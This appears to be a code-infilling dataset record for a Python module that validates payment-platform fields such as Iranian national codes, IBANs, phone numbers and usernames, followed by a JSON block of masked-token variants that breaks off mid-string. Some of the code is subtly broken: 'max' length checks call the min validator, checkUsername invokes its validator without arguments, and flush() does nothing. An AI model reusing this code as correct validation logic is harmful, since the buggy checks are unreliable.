def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):
data = {'userId': userId, 'subId': subId}
self.addValidation({'field': field, 'value': data}, self.
_check_with_subMerchantBankAccountValidator)
return self
def checkDataLength(self, field, length, mode='equal', data='unAssigned'):
if mode == 'equal':
validatorFunction = self._check_with_equalDataLengthValidator
if mode == 'min':
validatorFunction = self._check_with_minDataLengthValidator
if mode == 'max':
validatorFunction = self._check_with_minDataLengthValidator
self.addValidation({'field': field, 'value': data, 'length': length
}, validatorFunction)
return self
def checkInputData(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_inputValidator)
return self
def checkTelephone(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_phoneNumberValidator)
return self
def checkIsIbanTransferable(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_IbanTransferable)
return self
def checkUsername(self, field, data='unAssigned'):
self.addValidation({'field': field, 'value': data}, self.
_check_with_username())
class DataValidator:
def __init__(self, data={}):
self.fieldValidator = FieldValidator(data)
self.objectValidator = ObjectValidator()
self.errors = {}
self.statusCode = 200
def getValidatorsErrors(self):
self.objectValidator.validate()
self.fieldValidator.validate()
for key in self.fieldValidator.getErrors().keys():
self.errors[key] = self.errors.get(key, []
) + self.fieldValidator.getErrors()[key]
self.statusCode = self.fieldValidator.statusCode
for key in self.objectValidator.getErrors().keys():
self.errors[key] = self.errors.get(key, []
) + self.objectValidator.getErrors()[key]
self.statusCode = (self.objectValidator.statusCode if self.
objectValidator.statusCode != 200 else self.statusCode)
return self.errors
def generateMessage(self):
messages = []
errorKeys = self.errors.keys()
if 'email' in errorKeys:
messages.append(' آدرس ایمیل نامعتبر است')
if 'name' in errorKeys:
messages.append('نام را وارد کنید')
if 'username' in errorKeys:
messages.append('نام کاربری را وارد کنید')
if 'password' in errorKeys:
messages.append('رمز عبور را وارد کنید')
if 'mobile' in errorKeys:
messages.append('تلفن همراه خود را وارد کنید.')
if 'phone' in errorKeys:
messages.append(
'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')
if 'iban' in errorKeys or 'IBAN' in errorKeys:
messages.append(
'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'
)
if 'user' in errorKeys:
messages.append('لطفا وارد شوید')
return messages
<|reserved_special_token_1|>
import API.enum as enum
import re
class ObjectValidator():
def __init__(self, validationData={}, *args, **kwargs):
self.data = validationData
self.statusCode = 200
self.validationPipeline = []
self.errors = {}
self.invalidFields = []
def flush(self):
self = ObjectValidator()
return self
def setError(self, field, error):
if field not in self.invalidFields:
fieldErrors = self.errors.get(field, [])
if error[0] not in fieldErrors:
self.errors[field] = fieldErrors + [error[0]]
self.statusCode = error[1]
self.invalidFields.append(field)
def getErrors(self):
return self.errors
def validate(self):
for validation in self.validationPipeline:
try:
validation['validator'](validation['data'])
except:
self.setError(validation['data']['field'], enum.Error.INVALID_FIELD_DATA.value)
def addValidation(self, data, validatorFunction):
self.validationPipeline.append({
'data': data,
'validator': validatorFunction
})
def _check_with_authenticationValidator(self, data):
if not data['user'].is_authenticated:
self.setError(data['field'], enum.Error.UNAUTHORIZED.value)
def _check_with_nonDuplicateObjectValidator(self, data):
model = data['model']
if model.objects.filter(**data['filter']):
self.setError(data['field'], enum.Error.DUPLICATE_FIELDS.value)
def _check_with_ObjectExistenceValidator(self, data):
model = data['model']
if not model.objects.filter(**data['filter']):
self.setError(data['field'], enum.Error.GENERIC_OBJECT_NOT_FOUND.value)
def checkNonDuplicateObject(self, field, model, **filter):
self.addValidation({'field': field, 'model': model, 'filter': filter},
self._check_with_nonDuplicateObjectValidator)
return self
def checkObjectExistence(self, field, model, **filter):
self.addValidation({'field': field, 'model': model, 'filter': filter},
self._check_with_ObjectExistenceValidator)
return self
def checkUserAuthentication(self, field, user):
self.addValidation({'field': field, 'user': user},
self._check_with_authenticationValidator)
return self
#\b(?!(\d)\1{3})[13-9]{4}[1346-9][013-9]{5}\b
# postal code validation
class FieldValidator():
def __init__(self, validationData={}, *args, **kwargs):
self.data = validationData
self.validationPipeline = []
self.statusCode = 200
self.errors = {}
self.invalidFields = []
def flush(self):
self = FieldValidator()
def setError(self, field, error):
if field not in self.invalidFields:
fieldErrors = self.errors.get(field, [])
if error[0] not in fieldErrors:
self.errors[field] = fieldErrors + [error[0]]
self.statusCode = error[1]
self.invalidFields.append(field)
def getErrors(self):
return self.errors
def validate(self):
for validation in self.validationPipeline:
try:
validation['validator'](validation['data'])
except:
self.setError(validation['data']['field'], enum.Error.INVALID_FIELD_DATA.value)
return self
def addValidation(self, data, validatorFunction):
if (data['value'] == 'unAssigned') and data['field'] in self.data.keys():
data['value'] = self.data[data['field']]
elif data['value'] == 'unAssigned' and data['field'] not in self.data.keys():
data['value'] = None
self.validationPipeline.append({
'data': data,
'validator': validatorFunction
})
def _check_with_typeValidator(self, data):
if not isinstance(data['value'], data['type']):
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_nationalLegalCodeValidator(self, data):
nationalLegalCode = data['value']
result = 0
validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]
if len(nationalLegalCode) != 11:
self.setError(data['field'], enum.Error.INVALID_NATIONAL_LEGAL_CODE.value)
return
for i in range(10):
result += (int(nationalLegalCode[-2]) + 2 + int(nationalLegalCode[i])) * validationList[i]
if result % 11 == 10:
reminder = 0
else:
reminder = result % 11
if reminder == int(nationalLegalCode[-1]):
valid = True
else:
valid = False
if valid is False:
self.setError(data['field'], enum.Error.INVALID_NATIONAL_LEGAL_CODE.value)
def _check_with_nationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
valid = False
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if (r < 2 and r == int(nCode[9])) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_officer1NationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if (r < 2 and r == int(nCode[9])) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_officer2NationalCodeValidator(self, data):
nCode = data['value']
valid = True
if len(nCode) != 10:
valid = False
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
return
sum = 0
for i in range(9):
sum += int(nCode[i]) * (10 - i)
r = sum % 11
if (r < 2 and r == int(nCode[9])) or r >= 2 and r == 11 - int(nCode[9]):
valid = valid and True
if valid is False:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_featuresValidator(self, data):
for i in data['value']:
if i not in ["پلتفرم پرداخت در محل", "باشگاه مشتریان", "درگاه پرداخت اینترنتی"]:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
break
def _check_with_userNameValidator(self, data):
username = re.match(r"^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$", data["value"])
if 'admin' in data['value'] or 'zibal' in data['value'] or username is None:
self.setError(data['field'], enum.Error.INVALID_USERNAME.value)
def _check_with_phoneNumberValidator(self, data):
if data['value'] is None or len(data) < 1:
self.setError(data['field'], enum.Error.PHONE_INCORRECT_TEMPLATE.value)
def _check_with_mobileValidator(self, data):
mobileNumber = data['value']
if mobileNumber is None:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
return
match_object = re.match(r"(^09[0-9]{9}$)", mobileNumber)
if match_object is None or mobileNumber is None:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_emailValidator(self, data):
email = data['value']
if email is None:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
return
match_object = re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email)
if match_object is None or email is None:
self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
def _check_with_noneValidator(self, data):
if data['value'] is None or data['value'] == "":
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
def _check_with_fileValidator(self, data):
file = data['value']
field = data['field']
if file is None:
self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)
return
elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:
self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)
types = data['options'].get('types', None)
valid = False
if types is not None:
for type in types:
valid = valid or type in file.content_type
if valid is False:
self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)
def _check_with_IBANValidator(self, data):
iban = data['value']
if len(iban)!=26 or not iban.startswith("IR"):
self.setError(data['field'], enum.Error.IBAN_ERROR.value)
return
code = iban[4:]+iban[:4]
code = code.replace('I','18').replace('R','27')
if int(code)%97!=1:
self.setError(data['field'], enum.Error.IBAN_ERROR.value)
def _check_with_subMerchantBankAccountValidator(self, data):
if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID=data['value']['subId'], status=1).exists():
self.setError(data['field'], enum.Error.IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)
def _check_with_minDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) < data['length']:
self.setError(data['field'], (enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_maxDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) > data['length']:
self.setError(data['field'], (enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_equalDataLengthValidator(self, data):
if data['value'] is None or len(data['value']) != data['length']:
self.setError(data['field'], (enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))
def _check_with_inputValidator(self, data):
if data['value'] is None or len(data['value']) < 1:
self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
def _check_with_IbanTransferable(self, data):
if data['value'][4:7]=='062' and data['value'][-13:-10]=='080':
self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value)
def _check_with_username(self, data):
username = re.match(r"^[a-zA-Z0-9_.-]+$", data["value"])
if username is None:
self.setError(data['field'], enum.Error.INVALID_USERNAME.value)
#############################################################################
def checkType(self, field, type, value="unAssigned"):
self.addValidation({'field': field, 'type': type, 'value': value}, self._check_with_typeValidator)
return self
def checkNationalLegalCode(self, field, code="unAssigned"):
self.addValidation({'field': field, 'value': code}, self._check_with_nationalLegalCodeValidator)
return self
def checkOfficer1NationalCode(self, field, code="unAssigned"):
self.addValidation({'field': field, 'value': code}, self._check_with_officer1NationalCodeValidator)
return self
def checkOfficer2NationalCode(self, field, code="unAssigned"):
self.addValidation({'field': field, 'value': code}, self._check_with_officer2NationalCodeValidator)
return self
def checkNationalCode(self, field, code="unAssigned"):
self.addValidation({'field': field, 'value': code}, self._check_with_nationalCodeValidator)
return self
def checkFeatures(self, field, features="unAssigned"):
self.addValidation({'field': field, 'value': features}, self._check_with_featuresValidator)
return self
def checkUserName(self, field, username="unAssigned"):
self.addValidation({'field': field, 'value': username}, self._check_with_userNameValidator)
return self
def checkPhone(self, field, data="unAssigned"):
self.addValidation({'field': field, 'value': data}, self._check_with_phoneNumberValidator)
return self
def checkMobile(self, field, data="unAssigned"):
self.addValidation({'field': field, 'value': data}, self._check_with_mobileValidator)
return self
def checkEmail(self, field, data="unAssigned"):
self.addValidation({'field': field, 'value': data}, self._check_with_emailValidator)
return self
def checkNotNone(self, field, data="unAssigned"):
self.addValidation({'field': field, 'value': data}, self._check_with_noneValidator)
return self
def checkFile(self, field, data, **options):
self.addValidation({'field': field, 'value': data, 'options': options}, self._check_with_fileValidator)
return self
def checkIBAN(self, field, data="unAssigned"):
self.addValidation({'field': field, 'value': data}, self._check_with_IBANValidator)
return self
def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):
data = {
'userId': userId,
'subId': subId
}
self.addValidation({'field': field, 'value': data}, self._check_with_subMerchantBankAccountValidator)
return self
def checkDataLength(self, field, length,mode='equal', data="unAssigned"):
if mode == 'equal':
validatorFunction = self._check_with_equalDataLengthValidator
if mode == 'min':
validatorFunction = self._check_with_minDataLengthValidator
if mode == 'max':
validatorFunction = self._check_with_minDataLengthValidator
self.addValidation({'field': field, 'value': data, 'length': length}, validatorFunction)
return self
def checkInputData(self, field, data="unAssigned"):
self.addValidation({'field': field, 'value': data}, self._check_with_inputValidator)
return self
def checkTelephone(self, field, data="unAssigned"): ##TODO
self.addValidation({'field': field, 'value': data}, self._check_with_phoneNumberValidator)
return self
def checkIsIbanTransferable(self, field, data="unAssigned"):
self.addValidation({'field': field, 'value': data}, self._check_with_IbanTransferable)
return self
def checkUsername(self, field, data="unAssigned"):
self.addValidation({'field': field, 'value': data}, self._check_with_username())
class DataValidator:
def __init__(self, data={}):
self.fieldValidator = FieldValidator(data)
self.objectValidator = ObjectValidator()
self.errors = {}
self.statusCode = 200
def getValidatorsErrors(self):
self.objectValidator.validate()
self.fieldValidator.validate()
for key in self.fieldValidator.getErrors().keys():
self.errors[key] = self.errors.get(key, []) + self.fieldValidator.getErrors()[key]
self.statusCode = self.fieldValidator.statusCode
for key in self.objectValidator.getErrors().keys():
self.errors[key] = self.errors.get(key, []) + self.objectValidator.getErrors()[key]
self.statusCode = self.objectValidator.statusCode if self.objectValidator.statusCode != 200 else self.statusCode
return self.errors
def generateMessage(self):
messages = []
errorKeys = self.errors.keys()
if 'email' in errorKeys:
messages.append(' آدرس ایمیل نامعتبر است')
if "name" in errorKeys :
messages.append('نام را وارد کنید')
if 'username' in errorKeys:
messages.append('نام کاربری را وارد کنید')
if 'password' in errorKeys:
messages.append('رمز عبور را وارد کنید')
if 'mobile' in errorKeys:
messages.append('تلفن همراه خود را وارد کنید.')
if 'phone' in errorKeys:
messages.append('تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')
if 'iban' in errorKeys or 'IBAN' in errorKeys:
messages.append('شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله')
if 'user' in errorKeys:
messages.append('لطفا وارد شوید')
return messages
|
flexible
|
{
"blob_id": "e8daf03f987c7512ff245bfbe16c447acd6b5986",
"index": 7574,
"step-1": "<mask token>\n\n\nclass FieldValidator:\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.validationPipeline = []\n self.statusCode = 200\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = FieldValidator()\n\n def setError(self, field, error):\n if field not in self.invalidFields:\n fieldErrors = self.errors.get(field, [])\n if error[0] not in fieldErrors:\n self.errors[field] = fieldErrors + [error[0]]\n self.statusCode = error[1]\n self.invalidFields.append(field)\n\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], enum.Error.\n INVALID_FIELD_DATA.value)\n return self\n\n def addValidation(self, data, validatorFunction):\n if data['value'] == 'unAssigned' and data['field'] in self.data.keys():\n data['value'] = self.data[data['field']]\n elif data['value'] == 'unAssigned' and data['field'\n ] not in self.data.keys():\n data['value'] = None\n self.validationPipeline.append({'data': data, 'validator':\n validatorFunction})\n\n def _check_with_typeValidator(self, data):\n if not isinstance(data['value'], data['type']):\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_nationalLegalCodeValidator(self, data):\n nationalLegalCode = data['value']\n result = 0\n validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]\n if len(nationalLegalCode) != 11:\n self.setError(data['field'], enum.Error.\n INVALID_NATIONAL_LEGAL_CODE.value)\n return\n for i in range(10):\n result += (int(nationalLegalCode[-2]) + 2 + int(\n nationalLegalCode[i])) * validationList[i]\n if result % 11 == 10:\n reminder = 0\n else:\n reminder = result % 11\n if reminder == int(nationalLegalCode[-1]):\n valid = True\n else:\n valid = False\n if valid is False:\n self.setError(data['field'], enum.Error.\n INVALID_NATIONAL_LEGAL_CODE.value)\n <mask token>\n\n def _check_with_officer1NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_officer2NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_featuresValidator(self, data):\n for i in data['value']:\n if i not in ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',\n 'درگاه پرداخت اینترنتی']:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.\n value)\n break\n\n def _check_with_userNameValidator(self, data):\n username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])\n if 'admin' in data['value'] or 'zibal' in data['value'\n ] or username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def _check_with_phoneNumberValidator(self, data):\n if data['value'] is None or len(data) < 1:\n self.setError(data['field'], enum.Error.\n PHONE_INCORRECT_TEMPLATE.value)\n <mask token>\n <mask token>\n <mask token>\n\n def _check_with_fileValidator(self, data):\n file = data['value']\n field = data['field']\n if file is None:\n self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)\n return\n elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:\n self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)\n types = data['options'].get('types', None)\n valid = False\n if types is not None:\n for type in types:\n valid = valid or type in file.content_type\n if valid is False:\n self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)\n <mask token>\n\n def _check_with_subMerchantBankAccountValidator(self, data):\n if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID\n =data['value']['subId'], status=1).exists():\n self.setError(data['field'], enum.Error.\n IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)\n\n def _check_with_minDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) < data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_maxDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) > data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_equalDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) != data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_inputValidator(self, data):\n if data['value'] is None or len(data['value']) < 1:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_IbanTransferable(self, data):\n if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':\n self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value\n )\n\n def _check_with_username(self, data):\n username = re.match('^[a-zA-Z0-9_.-]+$', data['value'])\n if username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def checkType(self, field, type, value='unAssigned'):\n self.addValidation({'field': field, 'type': type, 'value': value},\n self._check_with_typeValidator)\n return self\n\n def checkNationalLegalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_nationalLegalCodeValidator)\n return self\n\n def checkOfficer1NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer1NationalCodeValidator)\n return self\n\n def checkOfficer2NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer2NationalCodeValidator)\n return self\n\n def checkNationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_nationalCodeValidator)\n return self\n\n def checkFeatures(self, field, features='unAssigned'):\n self.addValidation({'field': field, 'value': features}, self.\n _check_with_featuresValidator)\n return self\n <mask token>\n <mask token>\n <mask token>\n\n def checkEmail(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_emailValidator)\n return self\n\n def checkNotNone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_noneValidator)\n return self\n\n def checkFile(self, field, data, **options):\n self.addValidation({'field': field, 'value': data, 'options':\n options}, self._check_with_fileValidator)\n return self\n\n def checkIBAN(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IBANValidator)\n return self\n\n def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):\n data = {'userId': userId, 'subId': subId}\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_subMerchantBankAccountValidator)\n return self\n\n def checkDataLength(self, field, length, mode='equal', data='unAssigned'):\n if mode == 'equal':\n validatorFunction = self._check_with_equalDataLengthValidator\n if mode == 'min':\n validatorFunction = self._check_with_minDataLengthValidator\n if mode == 'max':\n validatorFunction = self._check_with_minDataLengthValidator\n self.addValidation({'field': field, 'value': data, 'length': length\n }, validatorFunction)\n return self\n\n def checkInputData(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_inputValidator)\n return self\n <mask token>\n\n def checkIsIbanTransferable(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IbanTransferable)\n return self\n <mask token>\n\n\nclass DataValidator:\n\n def __init__(self, data={}):\n self.fieldValidator = FieldValidator(data)\n self.objectValidator = ObjectValidator()\n self.errors = {}\n self.statusCode = 200\n\n def getValidatorsErrors(self):\n self.objectValidator.validate()\n self.fieldValidator.validate()\n for key in self.fieldValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.fieldValidator.getErrors()[key]\n self.statusCode = self.fieldValidator.statusCode\n for key in self.objectValidator.getErrors().keys():\n self.errors[key] = self.errors.get(key, []\n ) + self.objectValidator.getErrors()[key]\n self.statusCode = (self.objectValidator.statusCode if self.\n objectValidator.statusCode != 200 else self.statusCode)\n return self.errors\n\n def generateMessage(self):\n messages = []\n errorKeys = self.errors.keys()\n if 'email' in errorKeys:\n messages.append(' آدرس ایمیل نامعتبر است')\n if 'name' in errorKeys:\n messages.append('نام را وارد کنید')\n if 'username' in errorKeys:\n messages.append('نام کاربری را وارد کنید')\n if 'password' in errorKeys:\n messages.append('رمز عبور را وارد کنید')\n if 'mobile' in errorKeys:\n messages.append('تلفن همراه خود را وارد کنید.')\n if 'phone' in errorKeys:\n messages.append(\n 'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')\n if 'iban' in errorKeys or 'IBAN' in errorKeys:\n messages.append(\n 'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'\n )\n if 'user' in errorKeys:\n messages.append('لطفا وارد شوید')\n return messages\n",
"step-2": "<mask token>\n\n\nclass ObjectValidator:\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.statusCode = 200\n self.validationPipeline = []\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = ObjectValidator()\n return self\n <mask token>\n <mask token>\n <mask token>\n\n def addValidation(self, data, validatorFunction):\n self.validationPipeline.append({'data': data, 'validator':\n validatorFunction})\n\n def _check_with_authenticationValidator(self, data):\n if not data['user'].is_authenticated:\n self.setError(data['field'], enum.Error.UNAUTHORIZED.value)\n <mask token>\n\n def _check_with_ObjectExistenceValidator(self, data):\n model = data['model']\n if not model.objects.filter(**data['filter']):\n self.setError(data['field'], enum.Error.\n GENERIC_OBJECT_NOT_FOUND.value)\n <mask token>\n\n def checkObjectExistence(self, field, model, **filter):\n self.addValidation({'field': field, 'model': model, 'filter':\n filter}, self._check_with_ObjectExistenceValidator)\n return self\n\n def checkUserAuthentication(self, field, user):\n self.addValidation({'field': field, 'user': user}, self.\n _check_with_authenticationValidator)\n return self\n\n\nclass FieldValidator:\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.validationPipeline = []\n self.statusCode = 200\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = FieldValidator()\n\n def setError(self, field, error):\n if field not in self.invalidFields:\n fieldErrors = self.errors.get(field, [])\n if error[0] not in fieldErrors:\n self.errors[field] = fieldErrors + [error[0]]\n self.statusCode = error[1]\n self.invalidFields.append(field)\n\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], enum.Error.\n INVALID_FIELD_DATA.value)\n return self\n\n def addValidation(self, data, validatorFunction):\n if data['value'] == 'unAssigned' and data['field'] in self.data.keys():\n data['value'] = self.data[data['field']]\n elif data['value'] == 'unAssigned' and data['field'\n ] not in self.data.keys():\n data['value'] = None\n self.validationPipeline.append({'data': data, 'validator':\n validatorFunction})\n\n def _check_with_typeValidator(self, data):\n if not isinstance(data['value'], data['type']):\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_nationalLegalCodeValidator(self, data):\n nationalLegalCode = data['value']\n result = 0\n validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]\n if len(nationalLegalCode) != 11:\n self.setError(data['field'], enum.Error.\n INVALID_NATIONAL_LEGAL_CODE.value)\n return\n for i in range(10):\n result += (int(nationalLegalCode[-2]) + 2 + int(\n nationalLegalCode[i])) * validationList[i]\n if result % 11 == 10:\n reminder = 0\n else:\n reminder = result % 11\n if reminder == int(nationalLegalCode[-1]):\n valid = True\n else:\n valid = False\n if valid is False:\n self.setError(data['field'], enum.Error.\n INVALID_NATIONAL_LEGAL_CODE.value)\n\n def _check_with_nationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_officer1NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_officer2NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_featuresValidator(self, data):\n for i in data['value']:\n if i not in ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',\n 'درگاه پرداخت اینترنتی']:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.\n value)\n break\n\n def _check_with_userNameValidator(self, data):\n username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])\n if 'admin' in data['value'] or 'zibal' in data['value'\n ] or username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def _check_with_phoneNumberValidator(self, data):\n if data['value'] is None or len(data) < 1:\n self.setError(data['field'], enum.Error.\n PHONE_INCORRECT_TEMPLATE.value)\n\n def _check_with_mobileValidator(self, data):\n mobileNumber = data['value']\n if mobileNumber is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match('(^09[0-9]{9}$)', mobileNumber)\n if match_object is None or mobileNumber is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_emailValidator(self, data):\n email = data['value']\n if email is None:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n return\n match_object = re.match(\n '(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)', email)\n if match_object is None or email is None:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_noneValidator(self, data):\n if data['value'] is None or data['value'] == '':\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_fileValidator(self, 